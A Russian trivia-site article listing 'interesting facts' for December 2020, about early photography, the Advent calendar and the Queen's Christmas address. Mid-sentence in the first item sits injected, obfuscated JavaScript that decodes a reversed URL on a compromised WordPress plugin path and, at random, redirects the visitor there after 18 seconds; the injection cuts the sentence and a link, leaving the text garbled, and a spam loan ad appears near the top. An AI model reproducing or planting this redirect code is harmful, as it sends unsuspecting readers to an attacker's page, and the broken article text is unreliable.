Сайт с самыми интересными фактами, вопросами викторин, загадками и человеческими заблуждениями!
займ на карту кредит онлайн рко

Обзор: самые интересные факты за декабрь 2020 г.

258
  1. Декабрь – месяц предновогодний. А значит, что совсем скоро в мире случится целый шквал салютов, праздничных столов, детей в милых костюмах и наряженных елок с гирляндами… А вместе с тем – миллионы фотографий, селфи и постановочных фотосессий. «Взорвется» Инстаграмм, предновогодним настроением наполнится лента ВКонтакте – ведь сейчас фотография является обычным повседневным делом. Но еще в XIX веке ситуация была совершенно иной. Фото воспринималось как чудо техники, а съемка длилась несколько минут, что было весьма утомительно для фотографирующихся. Это сейчас мы можем принять самую экстравагантную и сюрреалистичную позу, а на $nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tolicheskogo-rozhdestva/” target=”_blank” rel=”noopener”>Адвент-календарем, который стал удачным стартапом Герхарда Ланга.
  2. В каждой стране люди ждут предновогоднего обращения президента. Но в Англии такая традиция длится 66 лет подряд с одним и тем же человеком. И вот он, заветный день, заветное время! 15.00, вещает королева Англии Елизавета II – и вся страна сосредоточена у своих экранов.

А есть ли у вас свои собственные традиции или семейные факты? Если да – обязательно запишите их. Ведь кто знает, вдруг ваши потомки заинтересуются семейными историями. А если нет – обязательно придумайте их. С наступающим Новым годом!

Комментарии закрыты.